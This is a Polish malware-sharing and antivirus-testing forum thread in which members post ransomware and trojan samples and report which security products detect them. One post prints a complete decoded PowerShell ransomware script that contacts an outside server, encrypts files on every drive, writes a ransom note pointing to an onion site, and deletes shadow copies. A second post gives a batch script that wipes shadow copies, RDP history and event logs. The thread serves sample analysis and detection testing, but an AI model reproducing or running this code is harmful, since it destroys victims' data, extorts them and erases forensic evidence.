Paczki, malware, złośliwe pliki, linki itp.
Immunet nie widzi.Zemana AL dopiero przy skanowaniu szczegółowym wykrywa jako Trojan:Generic/Kasatura.A!Ecke
Hitman wykrywa
Eset SS wykrywa
Immunet - PC Tools  Firewall Plus
Odpowiedz
Webroot wykrywa po uruchomieniu

[Aby zobaczyć linki, zarejestruj się tutaj]


[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
Phishing: PayPal

Treść widoczna jedynie dla zarejestrowanych użytkowników

Win32_Ursnif

[Aby zobaczyć linki, zarejestruj się tutaj]



Działanie podobne do zbota, kradnie poufne informacje z zainfekowanego komputera, nasłuchuje sieć, kradnie certyfikaty.

Treść widoczna jedynie dla zarejestrowanych użytkowników
Odpowiedz
(18.07.2017, 19:30)tachion napisał(a):

[Aby zobaczyć linki, zarejestruj się tutaj]

Win32_Ursnif

[Aby zobaczyć linki, zarejestruj się tutaj]



Działanie podobne do zbota, kradnie poufne informacje z zainfekowanego komputera, nasłuchuje sieć, kradnie certyfikaty.

Treść widoczna jedynie dla zarejestrowanych użytkowników
Avast nie wykrywa - wysłane do labu
Avira wykrywa
Comodo nie wykrywa - wysłane do labu

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
Eset SS wykrywa Win32_Ursnif
Ksapersky Free też
Immunet - PC Tools  Firewall Plus
Odpowiedz
Ransomware_PowerWare_Nemucod - wykorzystuje powershell

Treść widoczna jedynie dla zarejestrowanych użytkowników


[Aby zobaczyć linki, zarejestruj się tutaj]



zdekodowany skrypt:

Kod:
$khghcshjxnjHJJ = "HKCU:\Software\ENCR000\Scripts"
$KnnOOOjsjjfRFghcs = "Version"
if((Test-Path $khghcshjxnjHJJ) -eq $true)
{exit}
else
{
New-Item -Path $khghcshjxnjHJJ -Force | Out-Null
New-ItemProperty -Path $khghcshjxnjHJJ -Name $KnnOOOjsjjfRFghcs -Value "0" `
-PropertyType DWORD -Force | Out-Null}
$000073648732648732 = ([chaR[]](geT-RAnDOM -inpUT $(48..57 + 65..90 + 97..122) -CoUnT 49)) -jOIN ""
$467346782779685 = ([Char[]](geT-raNDOm -iNPut $(48..57 + 65..90 + 97..122) -coUNt 19)) -Join ""
$00462458234832 = ([cHaR[]](geT-RanDom -INPut $(48..57 + 65..90 + 97..122) -COuNt 24)) -join ""
$926225742886527 = "http://m1-systems.xyz/pi.php"
$910827030402006 = "string=$000073648732648732&string2=$467346782779685&uuid=$00462458234832"
$289766261002010 = nEw-OBjECT -coMOBJeCT MSxMl2.Xmlhttp
$289766261002010.oPen('PoST', $926225742886527, $faLse)
$289766261002010.sEtRequestHeader("c"+"oNTENt-TYPE","AppLIcatIoN/X-wwW-fOrM-URL"+"EnCOdeD")
$289766261002010.setReQuestHeaDer("c"+"ontENT-LengTH", $post.length)
$289766261002010.SetRequeStHeader("cONneCtiOn", "clOSe")
$289766261002010.SeNd($910827030402006)
Start-Sleep -Seconds 97
[BytE[]]$34623746238743278432462378462378=[SysTem.tExt.EnCODInG]::UniCode.GetBYtes($000073648732648732)
$JGDSDVNIUTGHBQSDGBHHFERFV = [Text.Encoding]::UTF8.GetBytes($467346782779685)
$hxTgshcYjsjdRgshxjThjsjdJ = new-ObjeCt System.SecuRity.Cryptography.RijndaelMaNaged
$hxTgshcYjsjdRgshxjThjsjdJ.Key = (new-Object Security.CryPtography.RFc2898DeriveBytes $000073648732648732, $JGDSDVNIUTGHBQSDGBHHFERFV, 5).GetBytes(32)
$hxTgshcYjsjdRgshxjThjsjdJ.IV = (neW-Object Security.Cryptography.ShA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
$hxTgshcYjsjdRgshxjThjsjdJ.Padding="ZeRos"
$hxTgshcYjsjdRgshxjThjsjdJ.Mode="CBC"
$IjhxRgsaghdWdsagdUjjsncRFhgshd= gDr|where {$_.Free}|Sort-Object -Descending
foreach($bGgxjhxRfshdjcTghajsichGhshjdj in $IjhxRgsaghdWdsagdUjjsncRFhgshd){
    gci $bGgxjhxRfshdjcTghajsichGhshjdj.root -RecursE -InClude "*.yuv","*.ycbcra","*.xis","*.x3f","*.x11","*.wpd","*.tex","*.sxg","*.stx","*.st8","*.st5","*.srw","*.srf","*.sr2","*.sqlitedb","*.sqlite3","*.sqlite","*.sdf","*.sda","*.sd0","*.s3db","*.rwz","*.rwl","*.rdb","*.rat","*.raf","*.qby","*.qbx","*.qbw","*.qbr","*.qba","*.py","*.psafe3","*.plc","*.plus_muhd","*.pdd","*.p7c","*.p7b","*.oth","*.orf","*.odm","*.odf","*.nyf","*.nxl","*.nx2","*.nwb","*.ns4","*.ns3","*.ns2","*.nrw","*.nop","*.nk2","*.nef","*.ndd","*.myd","*.mrw","*.moneywell","*.mny","*.mmw","*.mfw","*.mef","*.mdc","*.lua","*.kpdx","*.kdc","*.kdbx","*.kc2","*.jpe","*.incpas","*.iiq","*.ibz","*.ibank","*.hbk","*.gry","*.grey","*.gray","*.fhd","*.fh","*.ffd","*.exf","*.erf","*.erbsql","*.eml","*.dxg","*.drf","*.dng","*.dgc","*.des","*.der","*.ddrw","*.ddoc","*.dcs","*.dc2","*.db_journal","*.csl","*.csh","*.crw","*.craw","*.cib","*.ce2","*.ce1","*.cdrw","*.cdr6","*.cdr5","*.cdr4","*.cdr3","*.bpw","*.bgt","*.bdb","*.bay","*.bank","*.backupdb","*.backup","*.back","*.awg","*.apj","*.ait","*.agdl","*.ads","*.adb","*.acr","*.ach","*.accdt","*.accdr","*.accde","*.ab4","*.3pr","*.3fr","*.vmxf","*.vmsd","*.vhdx","*.vhd","*.vbox","*.stm","*.st7","*.rvt","*.qcow","*.qed","*.pif","*.pdb","*.pab","*.ost","*.ogg","*.nvram","*.ndf","*.m4p","*.m2ts","*.log","*.hpp","*.hdd","*.groups","*.flvv","*.edb","*.dit","*.dat","*.cmt","*.bin","*.aiff","*.xlk","*.wad","*.tlg","*.st6","*.st4","*.say","*.sas7bdat","*.qbm","*.qbb","*.ptx","*.pfx","*.pef","*.pat","*.oil","*.odc","*.nsh","*.nsg","*.nsf","*.nsd","*.nd","*.mos","*.indd","*.iif","*.fpx","*.fff","*.fdb","*.dtd","*.design","*.ddd","*.dcr","*.dac","*.cr2","*.cdx","*.cdf","*.blend","*.bkp","*.al","*.adp","*.act","*.xlr","*.xlam","*.xla","*.wps","*.tga","*.rw2","*.r3d","*.pspimage","*.ps","*.pct","*.pcd","*.m4v","*.fxg","*.flac","*.eps","*.dxb","*.drw","*.dot","*.db3","*.cpi","*.cls","*.cdr","*.arw","*.ai","*.aac","*.thm","*.srt","*.save","*.safe","*.rm","*.pwm","*.pages","*.obj","*.mlb","*.md","*.mbx","*.lit","*.laccdb","*.kwm","*.idx","*.html","*.flf","*.dxf","*.dwg","*.dds","*.csv","*.css","*.config","*.cfg","*.cer","*.asx","*.aspx","*.aoi","*.accdb","*.7zip","*.1cd","*.xls","*.wab","*.rtf","*.prf","*.ppt","*.oab","*.msg","*.mapimail","*.jnt","*.doc","*.dbx","*.contact","*.n64","*.m4a","*.m4u","*.m3u","*.mid","*.wma","*.flv","*.3g2","*.mkv","*.3gp","*.mp4","*.mov","*.avi","*.asf","*.mpeg","*.vob","*.mpg","*.wmv","*.fla","*.swf","*.wav","*.mp3","*.qcow2","*.vdi","*.vmdk","*.vmx","*.wallet","*.upk","*.sav","*.re4","*.ltx","*.litesql","*.litemod","*.lbf","*.iwi","*.forge","*.das","*.d3dbsp","*.bsa","*.bik","*.asset","*.apk","*.gpg","*.aes","*.ARC","*.PAQ","*.tar.bz2","*.tbk","*.bak","*.tar","*.tgz","*.gz","*.7z","*.rar","*.zip","*.djv","*.djvu","*.svg","*.bmp","*.png","*.gif","*.raw","*.cgm","*.jpeg","*.jpg","*.tif","*.tiff","*.NEF","*.psd","*.cmd","*.bat","*.sh","*.class","*.jar","*.java","*.rb","*.asp","*.cs","*.brd","*.sch","*.dch","*.dip","*.pl","*.vbs","*.vb","*.js","*.asm","*.pas","*.cpp","*.php","*.ldf","*.mdf","*.ibd","*.MYI","*.MYD","*.frm","*.odb","*.dbf","*.db","*.mdb","*.sql","*.SQLITEDB","*.SQLITE3","*.011","*.010","*.009","*.008","*.007","*.006","*.005","*.004","*.003","*.002","*.001","*.pst","*.onetoc2","*.asc","*.lay6","*.lay","*.ms11","*.sldm","*.sldx","*.ppsm","*.ppsx","*.ppam","*.docb","*.mml","*.sxm","*.otg","*.odg","*.uop","*.potx","*.potm","*.pptx","*.pptm","*.std","*.sxd","*.pot","*.pps","*.sti","*.sxi","*.otp","*.odp","*.wb2","*.123","*.wks","*.wk1","*.xltx","*.xltm","*.xlsx","*.xlsm","*.xlsb","*.slk","*.xlw","*.xlt","*.xlm","*.xlc","*.dif","*.stc","*.sxc","*.ots","*.ods","*.hwp","*.602","*.dotm","*.dotx","*.docm","*.docx","*.DOT","*.3dm","*.max","*.3ds","*.xml","*.txt","*.CSV","*.uot","*.RTF","*.pdf","*.XLS","*.PPT","*.stw","*.sxw","*.ott","*.odt","*.DOC","*.pem","*.p12","*.csr","*.crt","*.key"|%{
        try{
            $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh = New-Object SyStem.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
            if ($sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length -lt 4096){
                       $hxTgashdnUjuwjdcTgshdnRfgshd = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.BaseStream.Length
                       }
            else
            {
                       $hxTgashdnUjuwjdcTgshdnRfgshd = 4096
            }
           $34623746238743278432462378462378 = $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.ReadByTes($hxTgashdnUjuwjdcTgshdnRfgshd)
            $sxkYhysjhcjhRfaghgsbcbUjajsnjcRgahdh.Close()
            $xYhsjcRtsghhIIIahdhHshIOKKJ = $hxTgshcYjsjdRgshxjThjsjdJ.CreateEncRyPtor()
            $YhchcRgsghxYhshdcThgh = new-Object IO.MemoryStream
            $GshshdTgshxJuahxthH = new-Object Security.Cryptography.CryptoStream $YhchcRgsghxYhshdcThgh,$xYhsjcRtsghhIIIahdhHshIOKKJ,"Write"
            $GshshdTgshxJuahxthH.Write($34623746238743278432462378462378, 0,$34623746238743278432462378462378.Length)
            $GshshdTgshxJuahxthH.Close()
            $YhchcRgsghxYhshdcThgh.Close()
            $xYhsjcRtsghhIIIahdhHshIOKKJ.Clear()
            $IjxmxRgshhdYHhajhxRtasghhdI = $YhchcRgsghxYhshdcThgh.ToArray()
            $OlskcTshcUjsmcTgshdjJJ = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
            $OlskcTshcUjsmcTgshdjJJ.Write($IjxmxRgshhdYHhajhxRtasghhdI,0,$IjxmxRgshhdYHhajhxRtasghhdI.Length)
            $OlskcTshcUjsmcTgshdjJJ.Close()
            $bcyHsjhjxRtgahdhPoajndcTghshcJJ = $_.Directory.ToString() + '\_README-Encrypted-Files.html'
           $OkxxRtgshYHjsjcUjajxYhshjc = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGZvbnQgZmFjZT0ibW9ub3NwYWNlIj48aDE+ISEhIElNUE9SVEFOVCBJTkZPUk1BVElPTiAhISEhPC9oMT48YnI+DQoNCkFsbCBvZiB5b3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgd2l0aCBSU0EtMjA0OCBhbmQgQUVTLTEyOCBjaXBoZXJzLjxicj4NCk1vcmUgaW5mb3JtYXRpb24gYWJvdXQgdGhlIFJTQSBhbmQgQUVTIGNhbiBiZSBmb3VuZCBoZXJlOjxicj4NCjxhIGhyZWY9Imh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pIj5odHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JTQV8oY3J5cHRvc3lzdGVtKTwvYT48YnI+DQo8YSBocmVmPSJodHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL0FkdmFuY2VkX0VuY3J5cHRpb25fU3RhbmRhcmQiPmh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvQWR2YW5jZWRfRW5jcnlwdGlvbl9TdGFuZGFyZDwvYT48YnI+DQogICANCjxwPkRlY3J5cHRpbmcgb2YgeW91ciBmaWxlcyBpcyBPTkxZIHBvc3NpYmxlIHdpdGggdGhlIHByaXZhdGUga2V5IGFuZCBkZWNyeXB0IHByb2dyYW0sIHdoaWNoIGlzIG9uIG91ciBzZWNyZXQgc2VydmVyLjxicj4NCg0KVG8gcmVjZWl2ZSB5b3VyIHByaXZhdGUga2V5IGZvbGxvdyB0aGlzIGxpbms6PGJyPg0KDQoxLiA8YSBocmVmPSJodHRwOi8vN2h1dXlqaW9pc3RibHVjby5vbmlvbi50byI+aHR0cDovLzdodXV5amlvaXN0Ymx1Y28ub25pb24udG88L2E+PGJyPg0KDQo8cD5JZiB0aGUgYWRkcmVzcyBpcyBub3QgYXZhaWxhYmxlLCBmb2xsb3cgdGhlc2Ugc3RlcHM6PGJyPg0KMS4gRG93bmxvYWQgYW5kIGluc3RhbGwgVG9yIEJyb3dzZXI6IDxhIGhyZWY9Imh0dHBzOi8vd3d3LnRvcnByb2plY3Qub3JnL2Rvd25sb2FkL2Rvd25sb2FkLWVhc3kuaHRtbCI+aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQvZG93bmxvYWQtZWFzeS5odG1sPC9hPjxicj4NCjIuIEFmdGVyIGEgc3VjY2Vzc2Z1bCBpbnN0YWxsYXRpb24sIHJ1biB0aGUgYnJvd3NlciBhbmQgd2FpdCBmb3IgaW5pdGlhbGl6YXRpb24uPGJyPg0KMy4gVHlwZSBpbiB0aGUgYWRkcmVzcyBiYXI6IDdodXV5amlvaXN0Ymx1Y28ub25pb248YnI+DQo0LiBGb2xsb3cgdGhlIGluc3RydWN0aW9ucyBvbiB0aGUgc2l0ZS48YnI+PC9mb250Pg=="));
            if(!(Test-path($bcyHsjhjxRtgahdhPoajndcTghshcJJ))){
            New-IteM -Path $bcyHsjhjxRtgahdhPoajndcTghshcJJ -ItemTyPe file -Value $OkxxRtgshYHjsjcUjajxYhshjc
            AdD-Content -PAth $bcyHsjhjxRtgahdhPoajndcTghshcJJ -VaLue ("<p><font face'monospace'><h1>!!! Your Personal identification ID: $00462458234832</p></font></h1>")
            }}
               catch
               {
             
               }
       }}
$2885456708 = Get-WmiObjEct Win32_ShadoWCopy
ForEach($019384882892 in $2885456708) {
$019384882892.Delete()
}
exit
Odpowiedz
Ransomware_Globeimposter

Treść widoczna jedynie dla zarejestrowanych użytkowników



[Aby zobaczyć linki, zarejestruj się tutaj]


[Aby zobaczyć linki, zarejestruj się tutaj]


[Aby zobaczyć linki, zarejestruj się tutaj]


Kod:
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Odpowiedz
NOD32 wykrywa
ESET NOD32 Antivirus 
Zemana AntiMalware (Premium)
Odpowiedz
Immunet wykrywa
Immunet - PC Tools  Firewall Plus
Odpowiedz
Kaspersky Free wykrywa.
F-Secure SAFE 18.2
Odpowiedz
Polski Ransomware_ClicoCrypter

[Aby zobaczyć linki, zarejestruj się tutaj]



[Aby zobaczyć linki, zarejestruj się tutaj]


Treść widoczna jedynie dla zarejestrowanych użytkowników
Odpowiedz
AppCheck Anti-Ransomware blokuje po uruchomieniu

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
(16.08.2017, 20:38)tachion napisał(a):

[Aby zobaczyć linki, zarejestruj się tutaj]

Polski Ransomware_ClicoCrypter

[Aby zobaczyć linki, zarejestruj się tutaj]



[Aby zobaczyć linki, zarejestruj się tutaj]


Treść widoczna jedynie dla zarejestrowanych użytkowników

Kaspersky free - 1/1
Comodo 0/1 - Wysłane do labu.

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
(16.08.2017, 20:38)tachion napisał(a):

[Aby zobaczyć linki, zarejestruj się tutaj]

Polski Ransomware_ClicoCrypter

[Aby zobaczyć linki, zarejestruj się tutaj]



[Aby zobaczyć linki, zarejestruj się tutaj]


Treść widoczna jedynie dla zarejestrowanych użytkowników


Arcabit Internet Security 1/1
Odpowiedz
(16.08.2017, 20:38)tachion napisał(a):

[Aby zobaczyć linki, zarejestruj się tutaj]

Polski Ransomware_ClicoCrypter

[Aby zobaczyć linki, zarejestruj się tutaj]



[Aby zobaczyć linki, zarejestruj się tutaj]


Treść widoczna jedynie dla zarejestrowanych użytkowników

NOD32 wykrywa
ESET NOD32 Antivirus 
Zemana AntiMalware (Premium)
Odpowiedz
Trojan Downloader_Hancitor_Pony

[Aby zobaczyć linki, zarejestruj się tutaj]



Treść widoczna jedynie dla zarejestrowanych użytkowników
Odpowiedz
(17.08.2017, 21:09)tachion napisał(a):

[Aby zobaczyć linki, zarejestruj się tutaj]

Trojan Downloader_Hancitor_Pony

[Aby zobaczyć linki, zarejestruj się tutaj]



Treść widoczna jedynie dla zarejestrowanych użytkowników

Kaspersky free 1/1
Comodo 0/1 - wysłane do labu

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
Ten ransom z abonamentem RTV to chyba rządowy musi być Grin
1. Zawsze mam rację.
2. Jeśli nie mam racji, patrz pkt 1.
Odpowiedz
Co by tu powiedzieć.. witam po bardzo długiej przerwie. Zapewne tęskniliście za mną i za paczuszkami Suspicious.. ale przejdźmy do rzeczy. Oprócz paczki dodaję również analizę silników antywirusowych w pliku txt.


[Malware Pack] Aug 2017 #23:

Treść widoczna jedynie dla zarejestrowanych użytkowników
Odpowiedz
Windows Defender 20/23 86,95%
Odpowiedz


Skocz do:


Użytkownicy przeglądający ten wątek: 10 gości